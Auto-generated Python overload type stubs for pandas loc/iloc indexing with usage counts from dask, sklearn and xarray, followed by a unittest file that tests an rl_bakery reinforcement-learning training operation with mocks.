def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["a"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[int, int, int], Literal["a"]], /):
"""
usage.dask: 3
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[Literal["a"]]], /):
"""
usage.dask: 2
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[int, int, int], List[Literal["a"]]], /):
"""
usage.dask: 3
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[int, None, int], Literal["a"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, int, None], Literal["a"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[List[int], Literal["a"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[int, None, int], List[Literal["a"]]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, int, None], List[Literal["a"]]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["A"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["a"]], Literal["A"]], /):
"""
usage.dask: 3
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["a"], Literal["a"], Literal["a"]], Literal["A"]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[Literal["A"]]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["a"]], List[Literal["A"]]], /):
"""
usage.dask: 3
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["a"], Literal["a"], Literal["a"]], List[Literal["A"]]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["a"], Literal["o"], Literal["a"]], Literal["A"]],
/,
):
"""
usage.dask: 4
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[Literal["a"], None, Literal["a"]], Literal["A"]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, Literal["o"], None], Literal["A"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["a"], Literal["o"], Literal["a"]], List[Literal["A"]]],
/,
):
"""
usage.dask: 4
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[Literal["a"], None, Literal["a"]], List[Literal["A"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, Literal["o"], None], List[Literal["A"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["n"]], List[Literal["A"]]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self, _0: Tuple[List[Literal["n", "c", "a"]], List[Literal["A"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["c", "a"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["b", "t"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["b"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["t"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[List[Literal["h", "g", "c", "r"]], List[Literal["A"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["g", "c"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["h"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["r"]], List[Literal["A"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["B"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["j"]], Literal["B"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["j"], Literal["j"], Literal["j"]], Literal["B"]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[Literal["B"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[List[Literal["j"]], List[Literal["B"]]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["j"], Literal["j"], Literal["j"]], List[Literal["B"]]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["j"], Literal["q"], Literal["j"]], Literal["B"]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[Literal["j"], None, Literal["j"]], Literal["B"]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, Literal["q"], None], Literal["B"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[Literal["j"], Literal["q"], Literal["j"]], List[Literal["B"]]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[Literal["j"], None, Literal["j"]], List[Literal["B"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, Literal["q"], None], List[Literal["B"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None], slice[Literal["B"], Literal["D"], Literal["B"]]
],
/,
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[Literal["a"], Literal["o"], Literal["a"]],
slice[Literal["B"], Literal["D"], Literal["B"]],
],
/,
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[Literal["a"], None, Literal["a"]],
slice[Literal["B"], Literal["D"], Literal["B"]],
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, Literal["o"], None],
slice[Literal["B"], Literal["D"], Literal["B"]],
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None], slice[Literal["B"], Literal["A"], Literal["B"]]
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[Literal["j"], Literal["q"], Literal["j"]],
slice[Literal["B"], Literal["A"], Literal["B"]],
],
/,
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[Literal["j"], None, Literal["j"]],
slice[Literal["B"], Literal["A"], Literal["B"]],
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, Literal["q"], None],
slice[Literal["B"], Literal["A"], Literal["B"]],
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[pandas.core.series.Series, Literal["B"]], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["C", "A"]]], /
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[pandas.core.series.Series, List[Literal["C", "A"]]], /
):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], None, Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[None, Literal["e"], None], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], None, Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[Literal["2016-01-03"], Literal["2016-01-05"], Literal["2016-01-03"]],
slice[None, None, None],
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[
pandas._libs.tslibs.timestamps.Timestamp,
pandas._libs.tslibs.timestamps.Timestamp,
pandas._libs.tslibs.timestamps.Timestamp,
],
slice[None, None, None],
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Literal["2011-01-02"], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: slice[Literal["2011-01-02"], Literal["2011-01-10"], Literal["2011-01-02"]],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Literal["2011-01-02 10:00"], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(
self,
_0: slice[
pandas._libs.tslibs.period.Period, None, pandas._libs.tslibs.period.Period
],
/,
):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[None, pandas._libs.tslibs.period.Period, None], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["g"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["f"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["g"], Literal["j"], Literal["g"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["j"], Literal["l"], Literal["j"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["e"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["g"], Literal["i"], Literal["g"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["i"], Literal["l"], Literal["i"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["d"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[None, numpy.int64, None], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[numpy.int64, None, numpy.int64], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["e"], Literal["g"], Literal["e"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["d"], Literal["e"], Literal["d"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["c"], Literal["d"], Literal["c"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["l"], Literal["l"], Literal["l"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["d"], Literal["l"], Literal["d"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["c"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["p"], Literal["r"], Literal["p"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["l"], Literal["p"], Literal["l"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["l"], Literal["c"], Literal["l"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["o"], Literal["r"], Literal["o"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["l"], Literal["o"], Literal["l"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["c"], Literal["c"], Literal["c"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["i"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["h"], Literal["i"], Literal["h"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["i"], Literal["j"], Literal["i"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["j"], Literal["n"], Literal["j"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["n"], Literal["o"], Literal["n"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["F"], Literal["J"], Literal["F"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["J"], Literal["a"], Literal["J"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["A"], Literal["F"], Literal["A"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["F"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["e"], Literal["i"], Literal["e"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["I"], Literal["J"], Literal["I"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["A"], Literal["E"], Literal["A"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["E"], Literal["I"], Literal["E"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["a"], Literal["E"], Literal["a"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["k"], Literal["p"], Literal["k"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["j"], Literal["m"], Literal["j"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["m"], Literal["r"], Literal["m"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["k"], Literal["m"], Literal["k"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["m"], Literal["p"], Literal["m"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["c"], Literal["e"], Literal["c"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["g"], Literal["m"], Literal["g"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["c"], Literal["g"], Literal["c"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["c"], Literal["f"], Literal["c"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["i"], Literal["m"], Literal["i"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[Literal["f"], Literal["c"], Literal["f"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: List[Literal["y"]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["first"]], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["first"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["second", "first"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None],
slice[Literal["first"], Literal["second"], Literal["first"]],
],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], numpy.ndarray], /):
"""
usage.sklearn: 3
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["second"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["col1"]], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["col1", "col0"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[Literal["col1"]]], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], slice[None, Literal["first"], None]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None],
slice[Literal["first"], Literal["first"], Literal["first"]],
],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["second"]], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["b", "a"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["col_str", "col_cat"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[None, None, None], List[Literal["col_float", "col_int"]]],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[slice[None, None, None], List[Literal["col_int", "col_float"]]],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["col2", "col1"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None],
List[Literal["petal length (cm)", "sepal length (cm)"]],
],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None],
List[Literal["petal width (cm)", "sepal width (cm)"]],
],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[Literal["col2"]]], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, None, None], List[Literal["col_2", "col_1"]]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self,
_0: Tuple[
slice[None, None, None],
slice[Literal["col_1"], Literal["col_2"], Literal["col_1"]],
],
/,
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: List[bool], /):
"""
usage.sklearn: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[bool]], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], Literal["col_2"]], /):
"""
usage.sklearn: 1
"""
...
def __getitem__(self, _0: object, /):
"""
usage.dask: 250
usage.sklearn: 30
usage.xarray: 45
"""
...
class _iLocIndexer:
@overload
def __getitem__(self, _0: int, /):
"""
usage.dask: 9
usage.sklearn: 1
usage.xarray: 2
"""
...
@overload
def __getitem__(self, _0: slice[None, int, None], /):
"""
usage.dask: 17
usage.sklearn: 1
usage.xarray: 3
"""
...
@overload
def __getitem__(self, _0: slice[int, int, int], /):
"""
usage.dask: 8
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], int], /):
"""
usage.dask: 11
usage.sklearn: 8
"""
...
@overload
def __getitem__(self, _0: slice[None, numpy.int64, None], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: slice[numpy.int64, numpy.int64, numpy.int64], /):
"""
usage.dask: 3
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[int, int, int], int], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[None, None, None], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: slice[int, None, int], /):
"""
usage.dask: 5
"""
...
@overload
def __getitem__(self, _0: numpy.ndarray, /):
"""
usage.dask: 1
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: slice[numpy.int64, None, numpy.int64], /):
"""
usage.dask: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[int]], /):
"""
usage.dask: 6
usage.sklearn: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], List[bool]], /):
"""
usage.dask: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], slice[int, int, int]], /):
"""
usage.dask: 4
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], numpy.ndarray], /):
"""
usage.sklearn: 2
"""
...
@overload
def __getitem__(self, _0: Tuple[slice[None, None, None], slice[int, int, int]], /):
"""
usage.sklearn: 3
"""
...
@overload
def __getitem__(self, _0: Tuple[numpy.ndarray, int], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(
self, _0: Tuple[slice[None, int, None], slice[None, None, None]], /
):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: Tuple[int, int], /):
"""
usage.sklearn: 1
"""
...
@overload
def __getitem__(self, _0: List[int], /):
"""
usage.sklearn: 1
"""
...
def __getitem__(
self,
_0: Union[
slice[
Union[numpy.int64, int, None],
Union[None, numpy.int64, int],
Union[numpy.int64, int, None],
],
Tuple[
Union[
slice[Union[None, int], Union[None, int], Union[None, int]],
numpy.ndarray,
int,
],
Union[
List[Union[int, bool]],
int,
numpy.ndarray,
slice[Union[int, None], Union[int, None], Union[int, None]],
],
],
List[int],
numpy.ndarray,
int,
],
/,
):
"""
usage.dask: 71
usage.sklearn: 24
usage.xarray: 5
"""
...
@overload
def __setitem__(self, _0: Tuple[slice[None, int, None], int], _1: float, /):
"""
usage.dask: 1
"""
...
@overload
def __setitem__(self, _0: int, _1: float, /):
"""
usage.dask: 2
"""
...
@overload
def __setitem__(self, _0: Tuple[List[int], int], _1: float, /):
"""
usage.dask: 1
"""
...
@overload
def __setitem__(self, _0: Tuple[int, int], _1: float, /):
"""
usage.dask: 1
"""
...
@overload
def __setitem__(
self, _0: Tuple[slice[None, None, None], numpy.int32], _1: numpy.float64, /
):
"""
usage.sklearn: 1
"""
...
@overload
def __setitem__(
self, _0: Tuple[slice[None, None, None], int], _1: pandas.core.series.Series, /
):
"""
usage.sklearn: 4
"""
...
def __setitem__(
self,
_0: Union[
Tuple[
Union[int, slice[None, Union[None, int], None], List[int]],
Union[int, numpy.int32],
],
int,
],
_1: Union[numpy.float64, pandas.core.series.Series, float],
/,
):
"""
usage.dask: 5
usage.sklearn: 5
"""
...
| 20.844349
| 88
| 0.428417
| 3,965
| 43,523
| 4.374023
| 0.029004
| 0.071499
| 0.194545
| 0.208441
| 0.936574
| 0.924869
| 0.896442
| 0.889581
| 0.882373
| 0.862884
| 0
| 0.02739
| 0.383429
| 43,523
| 2,087
| 89
| 20.854336
| 0.618893
| 0.089769
| 0
| 0.788641
| 0
| 0
| 0.023301
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.230912
| true
| 0.000931
| 0.000931
| 0
| 0.234637
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
7416ebb11958aa383b7967ee2befb60d71e48d24
| 7,278
|
py
|
Python
|
rl_bakery/operation/test_train_agent_operation.py
|
pzhongp/rl-bakery
|
cf0887be7ca424ed81b48e5f9a304d9c6b201fe2
|
[
"Apache-2.0"
] | null | null | null |
rl_bakery/operation/test_train_agent_operation.py
|
pzhongp/rl-bakery
|
cf0887be7ca424ed81b48e5f9a304d9c6b201fe2
|
[
"Apache-2.0"
] | null | null | null |
rl_bakery/operation/test_train_agent_operation.py
|
pzhongp/rl-bakery
|
cf0887be7ca424ed81b48e5f9a304d9c6b201fe2
|
[
"Apache-2.0"
] | null | null | null |
from rl_bakery.applications.tf_rl_application import MockRLApplication
from rl_bakery.data_manager.data_manager import DATANAME
from rl_bakery.engine.abstract_engine_config import MockEngineConfig
from rl_bakery.operation.train_agent_operation import TrainAgentOperation
from rl_bakery.replay_buffer.replay_buffer_abstract import ReplayBufferAbstract
from rl_bakery.spark_utilities import PySparkTestCase
from unittest import TestCase
from unittest.mock import call, patch
class MockReplayBuffer(ReplayBufferAbstract):
def add_batch(self, traj_dict):
pass
def get_batch(self, mini_batch_size):
pass
class TestTrainActionOperation(PySparkTestCase, TestCase):
@patch('rl_bakery.agent_abstract.MockAgent', autospec=True)
@patch('rl_bakery.data_manager.data_manager.DataManager', autospec=True)
@patch('rl_bakery.operation.trajectory_builder.TrajectoryBuilder', autospec=True)
@patch('rl_bakery.operation.test_train_agent_operation.MockReplayBuffer', autospec=True)
def test_run(self, mock_rb, mock_tb, mock_data_manager, mock_agent):
mock_engine_config = MockEngineConfig()
mock_rl_app = MockRLApplication()
MockRLApplication._env_id_cols = ["env_id_1"]
MockRLApplication._ts_id_col = "ts_1"
mock_rl_app.agent_config = {
"num_iterations": 1,
"mini_batch_size": 32
}
run_context_dict = {
"available_data": [("test_data", 0)],
TrainAgentOperation.TRAINING_GLOBAL_STEP: 0
}
mock_data_manager.get_latest.return_value = run_context_dict
mock_timestep = [{"env_id_1": 1, "env_id_2": 2, "ts_1": 1, "obs_1": 1, "obs_2": 2,
"action": 1, "reward": 0.0, "step_type": 0}]
mock_timestep_df = self.spark.createDataFrame(mock_timestep)
def get_side_effect(data_name, _):
if data_name == DATANAME.TIMESTEP:
return mock_timestep_df
else:
return mock_agent
mock_data_manager.get.side_effect = get_side_effect
fake_mini_batch = "fake_mini_batch"
class MockMeta(object):
def __init__(self, prob):
self.probabilities = prob
fake_meta = MockMeta(0.1)
mock_rb.get_batch.return_value = fake_mini_batch, fake_meta
mock_traj_dict = {"observations": [1, 2, 3]}
mock_tb.run.return_value = mock_traj_dict
class MockLoss(object):
def __init__(self, loss):
self.loss = loss
mock_loss = MockLoss("mock_loss")
mock_agent.train.return_value = mock_loss
run_id = 5
operation = TrainAgentOperation(mock_rl_app, mock_engine_config, mock_data_manager)
operation._trajectory_builder = mock_tb
operation._replay_buffer = mock_rb
operation.run(run_id)
get_calls = [
call(DATANAME.MODEL, run_id - 1),
call(DATANAME.TIMESTEP, run_id)
]
mock_data_manager.get.assert_has_calls(get_calls, any_order=True)
mock_tb.run.assert_called_with(mock_timestep_df.collect())
mock_rb.add_batch.assert_called_with(mock_traj_dict)
mock_rb.pre_process.assert_called_with(0)
mock_rb.get_batch.assert_called_with(mock_rl_app.training_config["mini_batch_size"])
mock_agent.train.assert_called_with(fake_mini_batch, fake_meta.probabilities)
mock_rb.post_process.assert_called_with(fake_meta, mock_loss, 0)
expected_metadata = {
"available_data": [("test_data", 0), (DATANAME.MODEL, run_id)],
TrainAgentOperation.TRAINING_GLOBAL_STEP: 0 + mock_rl_app.training_config["num_iterations"]
}
store_calls = [
call(mock_agent, DATANAME.MODEL, run_id),
call(expected_metadata, DATANAME.RUN_CONTEXT, run_id)
]
mock_data_manager.store.assert_has_calls(store_calls, any_order=True)
@patch('rl_bakery.agent_abstract.MockAgent', autospec=True)
@patch('rl_bakery.data_manager.data_manager.DataManager', autospec=True)
@patch('rl_bakery.operation.trajectory_builder.TrajectoryBuilder', autospec=True)
@patch('rl_bakery.operation.test_train_agent_operation.MockReplayBuffer', autospec=True)
def test_run_lag(self, mock_rb, mock_tb, mock_data_manager, mock_agent):
mock_engine_config = MockEngineConfig()
mock_engine_config.training_timestep_lag = 2
mock_rl_app = MockRLApplication()
MockRLApplication._env_id_cols = ["env_id_1"]
MockRLApplication._ts_id_col = "ts_1"
mock_rl_app.agent_config = {
"num_iterations": 1,
"mini_batch_size": 32
}
run_context_dict = {
"available_data": [("test_data", 0)],
TrainAgentOperation.TRAINING_GLOBAL_STEP: 0
}
mock_data_manager.get_latest.return_value = run_context_dict
mock_timestep = [{"env_id_1": 1, "env_id_2": 2, "ts_1": 1, "obs_1": 1, "obs_2": 2,
"action": 1, "reward": 0.0, "step_type": 0}]
mock_timestep_df = self.spark.createDataFrame(mock_timestep)
def get_side_effect(data_name, _):
if data_name == DATANAME.TIMESTEP:
return mock_timestep_df
else:
return mock_agent
mock_data_manager.get.side_effect = get_side_effect
fake_mini_batch = "fake_mini_batch"
class MockMeta(object):
def __init__(self, prob):
self.probabilities = prob
fake_meta = MockMeta(0.1)
mock_rb.get_batch.return_value = fake_mini_batch, fake_meta
mock_traj_dict = {"observations": [1, 2, 3]}
mock_tb.run.return_value = mock_traj_dict
class MockLoss(object):
def __init__(self, loss):
self.loss = loss
mock_loss = MockLoss("mock_loss")
mock_agent.train.return_value = mock_loss
run_id = 5
operation = TrainAgentOperation(mock_rl_app, mock_engine_config, mock_data_manager)
operation._trajectory_builder = mock_tb
operation._replay_buffer = mock_rb
operation.run(run_id)
get_calls = [
call(DATANAME.MODEL, run_id - 1),
call(DATANAME.TIMESTEP, run_id - 2)
]
mock_data_manager.get.assert_has_calls(get_calls, any_order=True)
mock_tb.run.assert_called_with(mock_timestep_df.collect())
mock_rb.add_batch.assert_called_with(mock_traj_dict)
mock_rb.pre_process.assert_called_with(0)
mock_rb.get_batch.assert_called_with(mock_rl_app.training_config["mini_batch_size"])
mock_agent.train.assert_called_with(fake_mini_batch, fake_meta.probabilities)
mock_rb.post_process.assert_called_with(fake_meta, mock_loss, 0)
expected_metadata = {
"available_data": [("test_data", 0), (DATANAME.MODEL, run_id)],
TrainAgentOperation.TRAINING_GLOBAL_STEP: 0 + mock_rl_app.training_config["num_iterations"]
}
store_calls = [
call(mock_agent, DATANAME.MODEL, run_id),
call(expected_metadata, DATANAME.RUN_CONTEXT, run_id)
]
mock_data_manager.store.assert_has_calls(store_calls, any_order=True)
| 40.209945
| 103
| 0.676972
| 916
| 7,278
| 4.946507
| 0.124454
| 0.043699
| 0.039726
| 0.026264
| 0.874862
| 0.874862
| 0.868241
| 0.868241
| 0.868241
| 0.868241
| 0
| 0.011828
| 0.233306
| 7,278
| 180
| 104
| 40.433333
| 0.800179
| 0
| 0
| 0.813793
| 0
| 0
| 0.110745
| 0.05496
| 0
| 0
| 0
| 0
| 0.110345
| 1
| 0.068966
| false
| 0.013793
| 0.055172
| 0
